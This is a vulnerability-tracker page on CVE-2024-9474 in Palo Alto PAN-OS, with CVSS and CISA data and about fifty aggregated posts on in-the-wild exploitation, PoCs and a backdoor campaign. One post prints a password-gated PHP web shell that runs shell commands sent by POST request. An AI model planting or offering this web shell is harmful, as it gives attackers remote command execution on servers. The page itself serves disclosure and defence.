CVE-2024-9474

Published Nov 18, 2024

Last updated a month ago

Exploit knownCVSS medium 6.9

Insights

Analysis from the Intruder Security Team
Published Nov 19, 2024

The vulnerabilities CVE-2024-0012 and CVE-2024-9474 can be combined to allow for an unauthenticated attacker to gain command line access to the vulnerable device. Compromising a vulnerable device would allow an attacker to gain access to internal networks as these devices are designed to sit on the edge of networks.

The vulnerability is due to a misconfigured Nginx instance and a command injection vulnerability, both of which are exploitable in the devices default state. Watchtowr have released a technical blog post detailing the vulnerability and its exploitation.

Palo Alto have released patches and hotfixes for the PAN-OS vulnerabilities, details are available here and here.

Overview

Description
A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges. Cloud NGFW and Prisma Access are not impacted by this vulnerability.
Source
psirt@paloaltonetworks.com
NVD status
Analyzed

Risk scores

CVSS 4.0

Type
Secondary
Base score
6.9
Impact score
-
Exploitability score
-
Vector string
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:C/RE:H/U:Red
Severity
MEDIUM

CVSS 3.1

Type
Primary
Base score
7.2
Impact score
5.9
Exploitability score
1.2
Vector string
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Severity
HIGH

Known exploits

Data from CISA

Vulnerability name
Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
Exploit added on
Nov 18, 2024
Exploit action due
Dec 9, 2024
Required action
Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable. Additionally, the management interfaces for affected devices should not be exposed to untrusted networks, including the internet.

Weaknesses

psirt@paloaltonetworks.com
CWE-78
nvd@nist.gov
CWE-78

Social media

Hype score is a measure of social media activity compared against trending CVEs from the past 12 months. Max score 100.

Hype score

1

  1. ⚠️ CVE-2024-9474: Vulnerabilidad en Palo Alto Networks PAN-OS 🔒 🛑 Nivel de Urgencia: Alta 📉 Criticidad: Media Instituciones financieras que utilizan dispositivos de seguridad de Palo Alto Networks podrían estar en peligro si esta vulnerabilidad es explotada. https://t.co/H

    @BanCERT_gt

    16 Jan 2025

    28 Impressions

    1 Retweet

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  2. CVE-2024-0012 (9.3) and CVE-2024-9474 (6.9) exploitation is in the wild. Post-explotaition Webshell example dropped. <?php $z="system"; if(${"_POST"}["b"]=="iUqPd") { $z(${"_POST"}["x"]); };

    @byt3n33dl3

    8 Jan 2025

    34 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  3. ⚠️#ثغرات PAN-00-OS رقم CVE-2024-0012 و CVE-2024-9474! لا تزال هناك أجهزة #PaloAlto معرضة لتهديدات تصعيد الامتيازات والاستيلاء على النظام. تحقق من PoC لمهاجمة الأجهزة التي لم يتم إصلاحها وكيفية تحديد الإصدار المعرض للخطر باستخدام معلومات القائمة على #ASM! https://t.co/BVD5eerQhm h

    @CriminalIP_AR

    8 Jan 2025

    39 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  4. ⚠️PAN-OS #취약점 CVE-2024-0012 & CVE-2024-9474 주의! 여전히 권한 탈취와 시스템 장악 위협에 노출된 #팔로알토 장비들이 공개되어 있습니다. 패치되지않은 장비를 공격하는 PoC와 #ASM 기반 위협 인텔리전스로 취약한 버전을 확인하는 방법을 확인해보세요! https://t.co/oZDZfpoNfh https://t.co/z9jmhvAEYz https://t.co/A6yvp0hgod

    @CriminalIP_KR

    8 Jan 2025

    77 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  5. ⚠️PAN-OS #脆弱性 CVE-2024-0012 & CVE-2024-9474にご注意! 権限奪取とシステム掌握の脅威にさらされている #パロアルト 機器がまだ公開されています。 パッチが適用されていない機器を攻撃するPoCと #ASM ベースの脅威インテリジェンスで脆弱なバージョンを確認する方法をご確認ください!… https://t.co/VeuIaiHB0u https://t.co/K8lNWWuvlW

    @CriminalIP_JP

    8 Jan 2025

    117 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  6. Palo Alto の脆弱性 CVE-2024-9474 を悪用:LITTLELAMB.WOOLTEA バックドアを展開 https://t.co/khdpfQLYbo なんというか、バックドアのお手本のような LITTLELAMB.WOOLTEA ですね。すでに Palo Alto から、脆弱性 CVE-2024-9474… https://t.co/kT15lUwc4t

    @iototsecnews

    7 Jan 2025

    112 Impressions

    3 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  7. ''Exploit module for PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474) by sfewer-r7 · Pull Request #19663 · rapid7/metasploit-framework'' #infosec #pentest #redteam #blueteam https://t.co/3FCdNJYFEh

    @CyberWarship

    3 Jan 2025

    3568 Impressions

    12 Retweets

    47 Likes

    17 Bookmarks

    3 Replies

    1 Quote

  8. 🟥このバックドアは正規のlogdサービスを装っており、rc.localファイルを変更して、パッケージマネージャー「RedHat」の構成を変更することで永続性を実現 パロアルト製デバイスにバックドア「LITTLELAMB.WOOLTEA」を発見(CVE-2024-9474) https://t.co/K3qnn6cHZe

    @n_gsx1300r

    1 Jan 2025

    143 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  9. #Malware #Vulnerability CVE-2024-9474 Exploited: LITTLELAMB.WOOLTEA Backdoor Discovered in Palo Alto Devices https://t.co/lKYDkWD6jl

    @Komodosec

    28 Dec 2024

    12 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  10. 🚨 Exploiting #CVE-2024-9474: A Sophisticated Backdoor Campaign https://t.co/2SS0IaVRHt

    @UndercodeNews

    26 Dec 2024

    30 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  11. 🚨🚨CVE-2024-9474 Exploited: LITTLELAMB.WOOLTEA Backdoor Discovered in Palo Alto Devices ⚠Attackers exploited CVE-2024-9474, a vulnerability publicly disclosed just before the attack. Using this entry point, the threat actor deployed a malicious script named bwmupdate, which… htt

    @zoomeye_team

    26 Dec 2024

    724 Impressions

    4 Retweets

    8 Likes

    3 Bookmarks

    0 Replies

    0 Quotes

  12. Top 5 Trending CVEs: 1 - CVE-2024-53961 2 - CVE-2024-9474 3 - CVE-2024-30085 4 - CVE-2024-45387 5 - CVE-2024-12744 #cve #cvetrends #cveshield #cybersecurity https://t.co/4Fua3CAN6W

    @CVEShield

    26 Dec 2024

    13 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  13. 🚨パロアルト製デバイスにバックドア「LITTLELAMB.WOOLTEA」を発見 攻撃者はPAN-OSの脆弱性CVE-2024-9474を悪用 〜サイバーアラート 12月26日〜 https://t.co/E01LAaqwU6 #セキュリティ #インテリジェンス #OSINT

    @MachinaRecord

    26 Dec 2024

    70 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  14. CVE-2024-9474 Exploited: LITTLELAMB.WOOLTEA Backdoor Discovered in Palo Alto Devices https://t.co/BUmhL3SeMA

    @Dinosn

    25 Dec 2024

    13033 Impressions

    42 Retweets

    145 Likes

    47 Bookmarks

    1 Reply

    2 Quotes

  15. #threatreport #LowCompleteness LITTLELAMB.WOOLTEA: Stealthy Network Edge Device Backdoor | 24-12-2024 Source: https://t.co/yjBnqNpqMG Key details below ↓ 💀Threats: Littlelamb_wooltea, 🎯Victims: Palo alto network firewall 🌐Geo: Dutch 🔓CVEs: CVE-2024-9474… https://t.co/R8Nk

    @rst_cloud

    25 Dec 2024

    38 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  16. パロアルトネットワークス社機器の脆弱性CVE-2024-9474が悪用され、LITTLELAMB.WOOLTEAバックドアが仕込まれている。Northwave Cyber Security社報告。LITTLELAMB.WOOLTEAはlogdサービスに偽装し、rc.localとパッケージマネージャーの構成変更により永続化。 https://t.co/albXTm9Dd2

    @__kokumoto

    25 Dec 2024

    1987 Impressions

    3 Retweets

    24 Likes

    6 Bookmarks

    1 Reply

    1 Quote

  17. CVE-2024-9474 Exploited: LITTLELAMB.WOOLTEA Backdoor Discovered in Palo Alto Devices Learn about the stealthy operation of LITTLELAMB.WOOLTEA, a backdoor targeting Palo Alto Networks firewalls. Explore its entry point and persistent qualities. https://t.co/4OWXDt1wGj

    @the_yellow_fall

    25 Dec 2024

    411 Impressions

    3 Retweets

    6 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  18. Palo Alto merilis pembaruan untuk 2 kerentanan zero-day. CVE-2024-0012 memungkinkan "bypass autentikasi" dan CVE-2024-9474 terkait "eskalasi hak akses". Terungkap lebih dari 11.000 antarmuka manajemen PAN-OS terpapar, termasuk #Indonesia https://t.co/6hk4EV8Cnd https://t.co/KrtH

    @TweetThreatNews

    24 Dec 2024

    53 Impressions

    0 Retweets

    1 Like

    1 Bookmark

    0 Replies

    0 Quotes

  19. https://t.co/I0KbHzipmc Security breaches in Palo Alto Networks firewall devices On November 18, 2024, Palo Alto Networks announced two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in Palo Alto Networks OS (PAN-OS), the operating system used on their firewall devices. A …

    @B2bCyber

    19 Dec 2024

    40 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  20. GitHub - TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC: This PoC is targeting vulnerabilities in Palo Alto PAN-OS, specifically CVE-2024-0012 and CVE-2024-9474. This script automates the exploitation process, including payload creation, chunked delivery https://t.co/qwxjv3ZKT4

    @testalways

    14 Dec 2024

    41 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  21. 🚨We’ve just released a PoC and write-up on exploiting CVE-2024-0012 and CVE-2024-9474 in Palo Alto PAN-OS, demonstrating how these vulnerabilities can be chained for unauthenticated RCE 🔗 PoC Link: https://t.co/OLdPOO1Slt 📖 Write-up: https://t.co/oMHKDyDBEm

    @fahadshah4111

    13 Dec 2024

    64 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  22. 2024年11月分 #MBSD #SOC の検知傾向トピックスを公開しました。 今月は、Palo Alto Networks社のPAN-OSにおける認証回避・特権昇格の脆弱性(CVE-2024-0012, CVE-2024-9474)を狙った攻撃を新たに観測しました。 詳しくはこちら▼ https://t.co/G7Nl0Guxww #mbsd #脆弱性 #SOC… https://t.co/GtcYZyfJc8 https://t.co/egfuyt9Eit

    @mbsdnews

    13 Dec 2024

    589 Impressions

    1 Retweet

    3 Likes

    4 Bookmarks

    0 Replies

    0 Quotes

  23. ➡️ In November 2024, @PaloAltoNtwks disclosed two critical #vulnerabilities in PAN-OS, their Next-Generation Firewall operating system: CVE-2024-0012 and CVE-2024-9474. ➡️ Threat actors are actively chaining these vulnerabilities to achieve unauthenticated remote code execution

    @sygnia_labs

    11 Dec 2024

    40 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  24. What's wrong with you @PaloAltoNtwks ? Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474. https://t.co/R82Ng1GZmg https://t.co/yIRVpTByvX

    @l0rdmalware

    8 Dec 2024

    34 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  25. 🚨 Urgent Patch Needed: Palo Alto Networks PAN-#OS Vulnerability (#CVE-2024-9474) Grants Root Access https://t.co/676UqNqUJd

    @UndercodeNews

    8 Dec 2024

    29 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  26. [NEW VIDEO] @packetdefender explains how users can quickly find critical vulnerabilities like #paloaltonetworks CVE-2024-0012 and CVE-2024-9474; while also addressing #CISA BOD 23-02: Implementation Guidance for Mitigating the Risk from Internet-Exposed Management Interfaces http

    @forwardnetworks

    4 Dec 2024

    35 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  27. #threatreport #LowCompleteness Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 (Updated Nov. 22) | 02-12-2024 Source: https://t.co/Ufx2z1M2IZ Key details below ↓ 🧑‍💻Actors/Campaigns: Lunar_peek 🎯Victims: Palo alto networks 🌐Geo: Emea

    @rst_cloud

    3 Dec 2024

    107 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  28. A critical vulnerability (CVE-2024-9474) in PAN-OS exposes networks to unauthorized access and control, creating significant security risks. 🔗https://t.co/4RWZJYOJLi #itsecurity #cybersecurity

    @TrueFort

    2 Dec 2024

    10 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  29. Over 2,000 Palo Alto Networks devices compromised in a recent attack, exploiting CVE-2024-0012 & CVE-2024-9474. Stay vigilant and enhance security! Read more: https://t.co/qvngYfWNr0 #PaloAlto #CyberThreats #DataBreach https://t.co/Y4kwYLkeix

    @CyberPro_M

    2 Dec 2024

    73 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  30. 3/11 Exploited vulnerabilities: CVE-2024-0012 (Auth bypass) and CVE-2024-9474 (Priv. escalation). A dangerous combo for attackers. #FirewallVulnerabilities 🔐

    @Eth1calHackrZ

    2 Dec 2024

    76 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  31. 🚨 2,000+ Palo Alto firewalls compromised! 😱 CVE-2024-0012 lets attackers bypass auth, while CVE-2024-9474 escalates privileges. 📈 Time to tighten up access & patch your systems! 🛡️ #CyberSecurity #Infosec #NetworkSecurity https://t.co/7SEmEXHis9 https://t.co/UEpUJzoTiT

    @WTE_Solutions

    1 Dec 2024

    77 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  32. The Shadowserver Foundation reports that over 2,000 Palo Alto Networks firewalls have been hacked via two zero-day vulnerabilities: CVE-2024-0012 & CVE-2024-9474, enabling admin bypass and root access. Top targets: US & India. https://t.co/MEkAMzSr7y

    @darkwebinsight

    1 Dec 2024

    37 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    1 Quote

  33. CVE-2024-0012/CVE-2024-9474 : Found in Palo Alto Networks PAN-OS. Weak validation in Nginx configs & inputs allows for auth bypass, leading to admin privilege escalation. https://t.co/tAyhI4npuV

    @hackyboiz

    30 Nov 2024

    2707 Impressions

    18 Retweets

    47 Likes

    14 Bookmarks

    0 Replies

    0 Quotes

  34. Elevation of Privilege - PAN-OS (CVE-2024-9474). The need for authentication and admin access could limit this vulnerability's impact, but here we have the previous vulnerability Authentication Bypass - PAN-OS (CVE-2024-0012). 😏 #PaloAlto ➡️ https://t.co/17vlgiQy75 https://t.co

    @leonov_av

    29 Nov 2024

    69 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  35. 🚨 Threat Campaign Targets Palo Alto Networks Firewall Devices #CyberThreat #Vulnerabilities 🔑 Key Details: - 🎯 Threat actors exploit Palo Alto Networks PAN-OS vulnerabilities (CVE-2024-0012 & CVE-2024-9474) for remote code execution and privilege escalation. - 🔍 Attacker

    @ctilabs

    29 Nov 2024

    63 Impressions

    0 Retweets

    0 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  36. Is your PAN-OS updated? Two critical vulnerabilities, CVE-2024-0012 & CVE-2024-9474, can expose your network to serious threats. Don't wait! Secure your devices now with the latest patches. Protect your data and peace of mind. #CyberSecurity https://t.co/lDToZtOHwb

    @sequretek_sqtk

    29 Nov 2024

    34 Impressions

    1 Retweet

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  37. 🟠 Palo Alto Networks PAN-#OS, Privilege Escalation, #CVE-2024-9474 (MEDIUM) - Medium https://t.co/xo9onikWaq

    @dailycve

    28 Nov 2024

    34 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  38. 🚨Over 2000 Palo Alto Networks devices compromised! Hackers exploit CVEs(CVE-2024-0012 & CVE-2024-9474)to deploy malware like web shells and crypto miners.Immediate patching and securing management access are crucial source:https://t.co/W8UtsxkX9J #CyberSecurity #Vulnerabilit

    @ANlKsaha

    27 Nov 2024

    53 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  39. Copilot for Security Prompt of the Day: Provide guidance for CVE-2024-0012, CVE-2024-9474 affecting PAN-OS. And, then... Provide KQL queries. https://t.co/1o18sBq1CL Now read: Guidance for CVE-2024-0012, CVE-2024-9474 affecting PAN-OS using Microsoft Security capabilities…

    @rodtrent

    26 Nov 2024

    571 Impressions

    2 Retweets

    3 Likes

    2 Bookmarks

    0 Replies

    0 Quotes

  40. Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 (Updated Nov. 22) https://t.co/QtEN83shkT

    @rootsecdev

    26 Nov 2024

    762 Impressions

    2 Retweets

    3 Likes

    2 Bookmarks

    0 Replies

    0 Quotes

  41. 🎯 Zero-day week on Radio Infosec The past week brought so many "patch soon" news items that a separate digest was needed. 🎯 PanOS: Palo Alto firewalls received patches for CVE-2024-0012 and CVE-2024-9474, which together allow for authentication bypass and privilege escalation…

    @kaspersky

    26 Nov 2024

    1239 Impressions

    2 Retweets

    2 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  42. 🚨 Cybersecurity Alert 🚨 Over 2,000 Palo Alto Networks devices compromised due to exploited security flaws (CVE-2024-0012 & CVE-2024-9474). Threat actors are dropping web shells & crypto miners! #Hacking #news #CyberSecurity #PaloAltoNetworks https://t.co/XS9KkJQxez

    @safeyourweb

    26 Nov 2024

    41 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  43. The Shadowserver Foundation reports over 2,000 Palo Alto Networks firewalls have been hacked via two zero-day vulnerabilities: CVE-2024-0012 & CVE-2024-9474, enabling admin bypass and root access. https://t.co/lu9FvbiWfU

    @blackwired32799

    25 Nov 2024

    33 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  44. Файрволи потенційно 1000+ клієнтів Palo Alto Networks зламано Повідомляють про 2 zero-day: 1. CVE-2024-0012: Вразливість обходу автентифікації в веб-інтерфейсі управління PAN-OS. 2. CVE-2024-9474: Вразливість підвищення привілеїв у веб-інтерфейсі управління PAN-OS. 1/2

    @uaprotech

    25 Nov 2024

    38 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    1 Quote

  45. • Hackers exploited critical vulnerabilities (CVE-2024-0012, CVE-2024-9474) in Palo Alto Networks firewalls, enabling remote code execution. • Thousands of devices were compromised, though numbers dropped after patches were issued. https://t.co/p43DNFgGsy

    @F_Chkeel

    25 Nov 2024

    33 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  46. Exploit module for PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474) : https://t.co/LRVMnN95L7

    @binitamshah

    25 Nov 2024

    3571 Impressions

    7 Retweets

    26 Likes

    13 Bookmarks

    0 Replies

    0 Quotes

  47. Up to 2,000 Palo Alto Networks devices compromised via CVE-2024-0012 & CVE-2024-9474 flaws. Exploits dropping malware like Sliver & crypto miners. Patch NOW! # https://t.co/01bsNWOvaQ

    @TLDRStories

    25 Nov 2024

    35 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  48. ⚠️ Palo Alto Networks Privilege escalation vulnerability CVE-2024-9474: A privilege escalation vulnerability affecting authorized users.

    @cyberthreatzip

    25 Nov 2024

    15 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  49. 🚨 2,000+ #PaloAltoNetworks firewalls hacked! 🚨 Hackers exploited recent PAN-OS zero-days (CVE-2024-0012 & CVE-2024-9474) to gain remote admin access and escalate privileges. Palo Alto urges securing firewall access. 🔒 Source: @redhotcyber #CyberSecurity #ZeroDay #PANO

    @HWGSababa

    25 Nov 2024

    21 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  50. The impact of two critical zero-day vulnerabilities identified in Palo Alto Networks firewalls (CVE-2024-0012 and CVE-2024-9474) is growing.These vulnerabilities allow PAN-OS systems to gain administrator privileges and run commands at the root level. In particular, systems whose

    @fcybermentor

    24 Nov 2024

    79 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

Configurations

References